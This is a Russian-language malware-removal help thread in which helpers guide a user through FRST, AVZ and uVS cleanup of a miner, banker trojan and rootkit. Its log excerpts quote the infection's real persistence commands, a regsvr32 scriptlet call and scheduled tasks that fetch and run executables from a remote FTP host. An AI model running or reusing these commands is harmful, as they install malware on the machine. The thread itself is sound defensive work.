Помогите добить майнер :) [Trojan-Banker.Win32.Banbra.wojq, Trojan.BAT.Agent.bbf]

Доброго времени суток!
Заразил ПК каким-то майнером. Начал виснуть ПК при входе в систему, обнаружил, что из автозагрузки запускается regsvr32, который качает какой-то файл (предположительно ups.exe), далее запускается conhost.exe*32, который качает ещё других зловредов и планировщик задач забивается 4 задачами (Mysa1, Mysa2, Mysa3, ok), далее не знаю что именно грузило систему. Своими силами почистил реестр, прогнал cureit'ом и нашёл с помощью FRST, то что сидело в автозагрузке. Поэтому визуально сейчас всё ок, но смущает, что в свойствах браузера сценарий автонастройки не получается изменить. Просьба проверить, остались ли ещё какие-то проблемы. Спасибо заранее.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[ATTACH=CONFIG]674706[/ATTACH]

С прокси всё ок, это с работы.

Уважаемый(ая) [B]sTeeL42rus[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Здравствуйте,

Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи.[/URL]

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7e8894d2-c02d-4876-9c27-a2a17145d306} <==== ATTENTION (Restriction - IP)
ProxyServer: [S-1-5-21-1781993912-345317390-3542326927-1000] => nskcossquid01.zsttk.ru:8080
BHO-x32: No Name -> {8E8F97CD-60B5-456F-A201-73065652D099} -> No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR HKLM-x32\...\Chrome\Extension: [bgcifljfapbhgiehkjlckfjmgeojijcb] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [icanjjkadceebmhanpekkofdhclnoijl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lbjjfiihgfegniolckphpnfaokdkbmdm] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
U0 Partizan; system32\drivers\Partizan.sys [X]
File: C:\Windows\update.exe
Zip: C:\Windows\update.exe;C:\Windows\system\down.exe;C:\Windows\system32\s;C:\Windows\system32\ps;C:\Windows\system32\p;C:\Windows\system32\1.txt;C:\Windows\system32\cpu.txt;C:\Program Files (x86)\erhcnwal5y.dat;C:\ProgramData\mfc7sys.dat
2018-11-01 21:48 - 2018-11-01 21:48 - 002639872 _____ C:\Windows\update.exe
Folder: C:\Windows\rescache
File: C:\Windows\system\down.exe
2018-09-13 22:55 - 2018-09-13 22:55 - 000000000 ____D C:\Users\Все пользователи\RegRun
2018-09-13 22:55 - 2018-09-13 22:55 - 000000000 ____D C:\ProgramData\RegRun
2018-09-13 22:53 - 2018-10-29 00:12 - 000000000 ____D C:\Program Files (x86)\UnHackMe
2018-09-07 19:10 - 2018-11-01 21:48 - 000000081 _____ C:\Windows\system32\s
2018-09-07 19:10 - 2018-11-01 21:48 - 000000079 _____ C:\Windows\system32\ps
2018-09-07 19:10 - 2018-11-01 21:48 - 000000077 _____ C:\Windows\system32\p
2018-09-06 20:04 - 2018-09-06 20:04 - 000002001 _____ C:\Windows\system32\cpu.txt
2018-09-06 20:03 - 2018-09-06 20:03 - 000000005 _____ C:\Windows\system32\1.txt
2018-10-27 19:56 - 2018-10-27 19:56 - 000002681 _____ C:\Windows\cpu.txt
Folder: C:\safe
2017-05-20 13:09 - 000000029 _____ () C:\ProgramData\mfc7sys.dat
2017-05-20 13:07 - 2017-05-20 13:09 - 000000029 _____ () C:\Users\Все пользователи\mfc7sys.dat
2017-12-05 05:18 - 2017-12-05 05:18 - 000000048 ____H () C:\Program Files (x86)\erhcnwal5y.dat
C:\Users\sTeeL\AppData\Local\Temp\downloader.exe
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> No File
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> No File
Task: {70AA880D-4FBF-415A-8206-F4413EB25965} - \Opera scheduled Autoupdate 1467266623 -> No File <==== ATTENTION
Task: {BF662E29-8A01-4B19-852F-473A6ED83B45} - \Opera scheduled Autoupdate 1467266364 -> No File <==== ATTENTION
Task: {F6730CA6-5C06-4186-8EC1-058A7E6322F3} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
MSCONFIG\Services: Ghostery Storage Server => 2
File: D:\pool\mfc7sys\mfc7sys.exe
FirewallRules: [{2079D2B6-65DA-45A6-A0FA-DDCD0B43C014}] => (Allow) C:\Program Files (x86)\UnHackMe\wu.exe
FirewallRules: [{6A489918-F6B3-49A1-83BC-BE85D0A0AEB1}] => (Allow) C:\Program Files (x86)\UnHackMe\wu.exe
FirewallRules: [{E2645527-901C-4E08-BA52-8F6754CBEF42}] => (Allow) C:\Program Files (x86)\UnHackMe\RegRunInfo.exe
FirewallRules: [{9DB5D16A-B269-49BE-A8C6-5DCAB832BF73}] => (Allow) C:\Program Files (x86)\UnHackMe\RegRunInfo.exe
Reboot:
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/LIST]

На рабочем столе образуется карантин вида [B]<date>.zip[/B] загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

До того, как прочёл Ваш комментарий, перезагрузил ПК и началось всё заново. Карантин отправил. Скрипт прогнал, не помогло, загружал его из безопасного режима. Сейчас ничего сам не отключал и не удалял. Логи AVZ прикрепил. Фикслог прикрепил. Прогнал ещё раз FRST, логи тоже прикрепил.

Знакома ли Вам следующая настройка?
[CODE]
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
[/CODE]

HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[B]Важно[/B]: необходимо отметить и профиксить [B]только[/B] то, что указано ниже.
[CODE]
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
[/CODE]


AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Windows\help\lsmosee.exe','');
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\update.exe','');
QuarantineFile('c:\windows\debug\item.dat','');
QuarantineFile('a.exe','');
QuarantineFile('C:\Windows\debug\item.dat','');
TerminateProcessByName('c:\windows\temp\conhost.exe');
QuarantineFile('c:\windows\temp\conhost.exe','');
DeleteFile('c:\windows\temp\conhost.exe','32');
DeleteFile('C:\Windows\debug\item.dat','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start');
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
DeleteFile('c:\windows\update.exe','32');
DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('c:\windows\debug\ok.dat','32');
DeleteFile('C:\Windows\help\lsmosee.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/CODE]

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:
[CODE]
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Файл quarantine.zip из папки AVZ загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

- Подготовьте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]AdwCleaner[/URL] и приложите его в теме.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Уточните пожалуйста, Вам знакома следующая программа?
[CODE]D:\pool\mfc7sys\mfc7sys.exe[/CODE]

Если да, то:

Похоже взяли утилитой FRST в карантин файл mfc7sys.dat (возможно он пренадлежит приложению mfc7sys), для восстановление из карантина файлов, выполните следующее:

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
RestoreQuarantine: C:\FRST\Quarantine\C\ProgramData\mfc7sys.dat.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\system32\cpu.txt.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\cpu.txt.xBAD
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![/LIST]

Добрый день!
Заранее извиняюсь, я немного модифицировал скрипт, добавив туда ещё файлов. Карантин отправил.[ATTACH=CONFIG]674729[/ATTACH][ATTACH=CONFIG]674730[/ATTACH]

[QUOTE=SQ;1491217]Знакома ли Вам следующая настройка?
[CODE]
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [SearchList] = zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix,zsttk-rcu-netrix
[/CODE]

Да, знакома, это прокси с работы.

Уточните пожалуйста, Вам знакома следующая программа?
[CODE]D:\pool\mfc7sys\mfc7sys.exe[/CODE]

Этой программы сейчас там нет, это был кейлогер, который я ставил специально, можно не восстанавливать эти файлы.

Лог AwdCleaner прилагаю.
После запуска скрипта, ПК ребутнулся и загрузился быстро, но в процессах снова появился этот conhost запущенный из Temp.

[url=https://virusinfo.info/showthread.php?t=218752&p=1480599&viewfull=1#post1480599]Удалите в AdwCleaner[/url] всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

Скрипт надо каждый раз прогонять? Пришлось загружаться из безопасного режима, т.к. в обычном режиме всё опять висело.

Приложите новый лог FRST из безопасного режима. Пока не загружайтесь в нормальный режим.

[QUOTE=SQ;1491242]Приложите новый лог FRST из безопасного режима. Пока не загружайтесь в нормальный режим.[/QUOTE]

Готово.

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
CloseProcesses:
File: C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_30_0_0_134_pepper.exe
2018-11-03 20:10 - 2018-11-03 20:10 - 002639872 _____ C:\Windows\update.exe
2018-11-03 13:12 - 2018-11-03 19:15 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
2018-11-03 13:12 - 2018-11-03 19:15 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
2018-11-03 13:12 - 2018-11-03 19:15 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
2018-11-03 13:12 - 2018-11-03 19:15 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2018-11-03 13:12 - 2018-11-03 19:15 - 000003186 _____ C:\Windows\System32\Tasks\ok
2018-11-03 01:44 - 2018-11-03 20:10 - 000000081 _____ C:\Windows\system32\s
2018-11-03 01:44 - 2018-11-03 20:10 - 000000079 _____ C:\Windows\system32\ps
2018-11-03 01:44 - 2018-11-03 20:10 - 000000077 _____ C:\Windows\system32\p
2018-11-03 00:44 - 2018-11-03 12:29 - 000000084 _____ C:\Program Files\Common Files\xp.dat
2018-11-03 00:42 - 2018-11-03 19:11 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
Folder: C:\Windows\system
2018-11-03 00:44 - 2018-11-03 12:29 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
2018-11-03 00:42 - 2018-11-03 19:11 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
Folder: c:\windows\debug
c:\windows\temp\conhost.exe
Task: {2B3CC3D7-915B-4E57-AB8A-90F996BF9570} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {45C44033-3435-40EB-ACDF-8C228BAF6C0A} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {977952DE-1162-420E-8291-C0B7DD0D7E1A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {9AEDFF16-4ADC-42AB-AB0F-21B02B2F399E} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {F75F4480-DBB0-41DF-8B88-02DC8F55E4E6} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![/LIST]

Уточните Вы ставили ранее обновления закрывающее уязвимость SMB?

[QUOTE=SQ;1491245]Уточните Вы ставили ранее обновления закрывающее уязвимость SMB?[/QUOTE]

Я не ставил, после того, как подхватил троян, решил сначала накатить все обновления системы, в автоматическом режиме. Если среди них оно было, то возможно.

Загружаюсь пока в безопасном. Fixlog прикрепил. Надо ещё эту папку тереть - c:\windows\debug.

А где лог выполнения? Папку тереть не нужно. Есть предположение, что из-за уязвимости SMB проблема возвращается, у Вас Windows Firewall включен? На сколько вижу присутсвуют правила запрещающие доступ к SMB.

[QUOTE=SQ;1491248]А где лог выполнения? Папку тереть не нужно. Есть предположение, что из-за уязвимости SMB проблема возвращается, у Вас Windows Firewall включен? На сколько вижу присутсвуют правила запрещающие доступ к SMB.[/QUOTE]

Извиняюсь. Добавил. Есть речь про "Брандмауэр Windows", то да, включен, туда добавлял IP, с которого он GET'ом файлы забирает.
[ATTACH=CONFIG]674736[/ATTACH]

Могу я как-то точно определить, установлено ли обновление или попробовать, например вручную установить?

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
2018-11-03 13:11 - 2018-11-03 19:15 - 002359296 ____A [5506F673EB568897B1DB7C06EB4E761A] () c:\windows\debug\item.dat
2018-11-03 10:28 - 2018-10-19 00:09 - 005929472 ____A [0C17491CBA1062BE447C0076EBF47896] (TODO: <公司名>) c:\windows\debug\lsmose.exe
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![/LIST]

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Проверьте если вы установили обновления для Windows 7 X64:
[URL="http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4012212"]KB4012212[/URL]
[URL="https://www.catalog.update.microsoft.com/search.aspx?q=kb4012215"]KB4012215[/URL]

Вы можете попробовать их установить, если ранее их устанавливали, то второй раз они не установятся.

Готово.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[QUOTE=SQ;1491250]

Проверьте если вы установили обновления для Windows 7 X64:
[URL="http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4012212"]KB4012212[/URL]
[URL="https://www.catalog.update.microsoft.com/search.aspx?q=kb4012215"]KB4012215[/URL]

Вы можете попробовать их установить, если ранее их устанавливали, то второй раз они не установятся.[/QUOTE]

Из безопасного не получится. Попробовать сейчас из обычного загрузиться или ещё перед этим что-нибудь надо сделать?

Пока нет, сделайте еше один лог.

Скачайте программу [url="https://yadi.sk/d/6A65LkI1WEuqC"]Universal Virus Sniffer[/url] и [url="http://virusinfo.info/showthread.php?t=121767"]сделайте полный образ автозапуска uVS[/url].

Готово.

[URL="https://virusinfo.info/showthread.php?t=121767&p=897827&viewfull=1#post897827"]Выполните скрипт в uVS:[/URL]
[CODE];uVS v4.0.11 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
zoo %SystemRoot%\INF\MSIEF.EXE
zoo %SystemRoot%\WEB\N.VBS
delref AEROADMINSERVICE\[SERVICE]
delref %SystemDrive%\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.21.115\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.30.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.7\PSMACHINE_64.DLL
delall %SystemRoot%\INF\MSIEF.EXE
restart[/CODE]

Заархивируйте пожалуйста папку Zoo из каталога uVS с паролем virus и загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

P.S. По окончанию лечения вам необходимо будет сменить все пароли.

[QUOTE=SQ;1491256]
P.S. По окончанию лечения вам необходимо будет сменить все пароли.[/QUOTE]

Готово. Да, хорошо, поменяю.

[LIST][*] Скопируйте приведенный ниже текст в Блокнот и сохраните файл как [b]fixlist.txt[/b] с поддержкой [B]Unicode[/B] в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
[CODE]
CreateRestorePoint:
Zip:c:\windows\web\c3.bat
Folder: c:\windows\web
c:\windows\web\c3.bat
c:\windows\web\n.VBS
[/CODE][*] Запустите FRST и нажмите один раз на кнопку [b]Fix[/b] и подождите. [*] Программа создаст лог-файл [b](Fixlog.txt)[/b]. Пожалуйста, прикрепите его в следующем сообщении![/LIST]


На рабочем столе образуется карантин вида [B]<date>.zip[/B] загрузите по ссылке "[B][COLOR="#FF0000"]Прислать запрошенный карантин[/COLOR][/B]" вверху темы.

Готово.

Карантин не загрузился:
"Результат загрузки
Ошибка загрузки. Данный файл уже был загружен"

Изменить имя архива на минуту позже?

карантин пустой, пробуйте загрузиться в нормальный режим. Также пройдитесь утилитой [URL="https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool"]KVRT[/URL], только после того как установите обновления.
[CODE]"c:\windows\web\c3.bat" => not found[/CODE]

Сообщите по окончанию, что с проблемой?

Спасибо большое заранее, за Ваше потраченное время. Сначала пробегусь ещё раз вручную по реестру и попробую без подключения к сети запустить обновления. Отпишусь по результатам.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Прошёлся по автозагрузке в реестре - всё ок
Прогнал cureit - удалил downloader'ов
[ATTACH=CONFIG]674741[/ATTACH]
Прогнал KVRT - кроме вирусов в архиве нашёл какой-то в корзине
[ATTACH=CONFIG]674742[/ATTACH]
Прогнал ещё раз Вашими утилитами, ничего подозрительного не увидел.

После этого загрузился с отключенной витой парой от сетевой, запустил обновление kb4012212, всё ок, перезагрузился. kb4012215 не установилось, выдало ошибку, что не подходит для моего ПК, хотят качал аналогично как и kb4012212 для Win7 x64. Загрузился в БР (безопасном режиме), подключил инет, скачал демо-версию касперского, из БР он не ставится, загрузился с отключенным инетом в обычном режиме, без инета он не устанавливается, подключил, всё время мониторил диспетчер задач, все было ок, на середине загрузки касперский выдал ошибку, что установка не может быть продолжена и что на компьютере вирусы. Перезагрузился и всё по новой... Винду сносить не поможет? Уже готов на такие радикальные меры, хоть и считаю это неправильным.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

В общем, почистил опять всё, чтобы не мешало запускаться нормально, при запуске убил conhost, запустил KVRT. В итоге был найден и вылечен MEM:Rootkit.Win64.DarkGalaxy.a
Сейчас касперский ещё прогоняет дальше после перезагрузки ПК, но никакие левые процессы уже не грузились и проблемные папки тоже без зловредов. Поэтому огромное Вам ещё раз спасибо. Завтра точно уже сообщу результаты и можно закрывать тему.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

Всё, тему можно закрывать. Проблем больше нет, касперский тоже установился. Огромное Вам спасибо за оперативное решение!

Отлично, скорее всего из-за MEM:Rootkit.Win64.DarkGalaxy.a прооблема возращалась, так как он находится в загрузочном секторе.

В завершение:
1.
[list][*]Пожалуйста, запустите adwcleaner.exe[*]В меню [B]Настройки[/B] -[B] Удалить AdwCleaner[/B] - выберите [B]Удалить[/B].[*]Подтвердите удаление, нажав кнопку: Да.[/list]

Переименуйте FRST.exe (или FRST64.exe) в [B]uninstall.exe[/B] и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]3[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]20[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
[LIST=3D1][*] c:\windows\debug\item.dat - [B]HEUR:Trojan.Win32.DiskWriter.gen=
[/B] ( AVAST4: Win32:Trojan-gen )[*] c:\windows\syswow64\drivers\64.exe - [B]not-a-virus:RiskTool.W=
in32.BitCoinMiner.jubw[/B] ( AVAST4: Win32:Malware-gen )[*] c:\windows\temp\conhost.exe - [B]Trojan.Win64.Miner.ijc[/B] ( A=
VAST4: Win32:Trojan-gen )[*] c:\windows\update.exe - [B]HEUR:Trojan.Win32.DiskWriter.gen[/B] =
( AVAST4: Win32:Malware-gen )[*] \update.exe - [B]HEUR:Trojan.Win32.DiskWriter.gen[/B] ( AVAST4: W=
in32:Malware-gen )[*] \zoo\msief.exe._a2fe663fa3f62136abab63694caa4ff15adf704a - [B]Tr=
ojan-Banker.Win32.Banbra.wojq[/B][/LIST][/LIST]

[QUOTE=sTeeL42rus;1491262]В итоге был найден и вылечен MEM:Rootkit.Win64.DarkGalaxy.a[/QUOTE]

Уточните пожалуйста, проблема случайно не возвращалась?

[QUOTE=SQ;1491313]Уточните пожалуйста, проблема случайно не возвращалась?[/QUOTE]

Добрый вечер. Нет, сейчас всё нормально.

Если проблема вернется то подготовьте лог uVS с загрузочного диска [url]https://chklst.ru/discussion/61/winpe-uvs[/url]

[QUOTE=SQ;1491322]Если проблема вернется то подготовьте лог uVS с загрузочного диска [url]https://chklst.ru/discussion/61/winpe-uvs[/url][/QUOTE]

Хорошо. Есть какие-то подозрения, что может вернуться?

[QUOTE=sTeeL42rus;1491326]Хорошо. Есть какие-то подозрения, что может вернуться?[/QUOTE]

Дело в том, что mem означает, что угрозу нашел в памяти, а обычно эта угроза назодится в загрузочном секторе и его можно выловить, только загрузившись с помощью загрузочного диска winpe.

[CODE]MEM:Rootkit.Win64.DarkGalaxy.a[/CODE]

[QUOTE=SQ;1491333]Дело в том, что mem означает, что угрозу нашел в памяти, а обычно эта угроза назодится в загрузочном секторе и его можно выловить, только загрузившись с помощью загрузочного диска winpe.

[CODE]MEM:Rootkit.Win64.DarkGalaxy.a[/CODE][/QUOTE]

Когда KVRT пытался его вылечить, то отправил ПК в ребут и запросил разрешения на действия до входа в пользователя (с помощью контроля учётных записей). Есть шанс, что он мог справиться самостоятельно? Если маловероятно, то я могу загрузиться с winpe, но это ближе к концу недели. Пока я вообще запретил запуск .exe через папку Temp.
[ATTACH=CONFIG]674770[/ATTACH]

Было бы не плохо убедиться, что вредоносного ПО не осталось в загрузочном секторе. Так сказать наверняка не могу, что KVRT справился или нет.